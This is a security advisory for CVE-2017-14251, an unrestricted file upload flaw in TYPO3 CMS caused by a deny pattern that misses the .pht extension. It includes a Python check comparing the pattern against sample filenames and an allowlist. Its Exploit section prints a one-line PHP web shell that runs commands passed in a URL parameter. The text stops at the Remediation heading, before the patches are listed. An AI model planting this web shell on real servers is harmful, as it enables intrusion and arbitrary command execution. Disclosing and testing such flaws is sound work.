Typo3 Unrestricted File Upload - Remote Code Execution

Advisory Information 
Title: TYPO3 CMS Unrestricted File Upload
Release date: 01/12/2017
Last update: 01/12/2017
Credits: Maurizio Siddu, Emaze Networks S.p.A.

Vulnerability Information 
Class: Unrestricted File Upload, Remote Code Execution
CVE: 2017-14251
CVSSv2: 6.5

Affected Software 
  • TYPO3 CMS versions 7.6.0 to 7.6.21 and 8.0.0 to 8.7.4

Vulnerability Details
The TYPO3 CMS allows registered users to create and modify digital content, including the possibility to upload files or images.
Specifically, the TYPO3 CMS uses a restriction mechanism based on a blacklist, implemented by the "fileDenyPattern" rule in the file "sysext/core/Classes/Core/SystemEnvironmentBuilder.php".


[...]
// Security related constant: Default value of fileDenyPattern
define('FILE_DENY_PATTERN_DEFAULT', '\\.(php[3-7]?|phpsh|phtml)(\\..*)?$|^\\.htaccess$');
// Security related constant: List of file extensions that should be registered as php script file extensions
define('PHP_EXTENSIONS_DEFAULT', 'php,php3,php4,php5,php6,php7,phpsh,inc,phtml');
[...]

The code above does not deny files with the .PHT extension. This file extension is associated with the Partial Hypertext file format, and PHT files are handled as executable by default in various web server setups.
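The gap can be checked mechanically. The following is an added example, not code from the advisory or from TYPO3: it runs the default pattern quoted above against constructed filenames and compares it with a pattern that also lists "pht" and with an extension allowlist. The case-insensitive match, the corrected pattern, the allowlist and the sample names are assumptions.

```python
import re

# Default deny pattern quoted in the advisory (PHP string unescaped to a raw regex).
FILE_DENY_PATTERN_DEFAULT = r'\.(php[3-7]?|phpsh|phtml)(\..*)?$|^\.htaccess$'

# Assumption: an illustrative corrected pattern that adds "pht"; not the vendor patch.
FILE_DENY_PATTERN_WITH_PHT = r'\.(php[3-7]?|phpsh|phtml|pht)(\..*)?$|^\.htaccess$'

# Assumption: a hypothetical allowlist of extensions a site actually needs.
ALLOWED_EXTENSIONS = {"jpg", "png", "pdf", "txt"}

# Constructed sample upload names, not taken from the advisory.
SAMPLE_NAMES = [
    "upload.php", "upload.php5", "upload.phtml", "upload.php.txt", ".htaccess",
    "upload.pht", "upload.PHT", "upload.pht.txt", "photo.jpg",
]


def is_denied(pattern, filename):
    """True when the deny pattern matches (assumed case-insensitive search)."""
    return re.search(pattern, filename, re.IGNORECASE) is not None


def accepted(pattern, names):
    """Names that a blacklist-only check would let through."""
    return [n for n in names if not is_denied(pattern, n)]


def newly_blocked(old_pattern, new_pattern, names):
    """Names the old pattern accepted but the new pattern denies."""
    return [n for n in accepted(old_pattern, names) if is_denied(new_pattern, n)]


def passes_upload_policy(pattern, filename, allowed=ALLOWED_EXTENSIONS):
    """Allowlist on the final extension, with the deny pattern kept as a second check."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in allowed and not is_denied(pattern, filename)


if __name__ == "__main__":
    print("accepted by default pattern:", accepted(FILE_DENY_PATTERN_DEFAULT, SAMPLE_NAMES))
    print("blocked only after adding pht:",
          newly_blocked(FILE_DENY_PATTERN_DEFAULT, FILE_DENY_PATTERN_WITH_PHT, SAMPLE_NAMES))
    print("pass allowlist + default pattern:",
          [n for n in SAMPLE_NAMES if passes_upload_policy(FILE_DENY_PATTERN_DEFAULT, n)])
```

With the allowlist in place "upload.pht" is rejected even under the default pattern, while "upload.pht.txt" is rejected only once the deny pattern itself lists "pht", which is why both checks are kept.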


Exploit
This security issue could lead to Remote Code Execution. For example, an attacker could use the file upload functionality of TYPO3 CMS to upload the following PHT file:


<?php echo shell_exec($_GET['cmd']); ?>

As a result, the uploaded file can be used to execute arbitrary commands on the remote system.


Remediation
Apply the security patches provided by the vendor: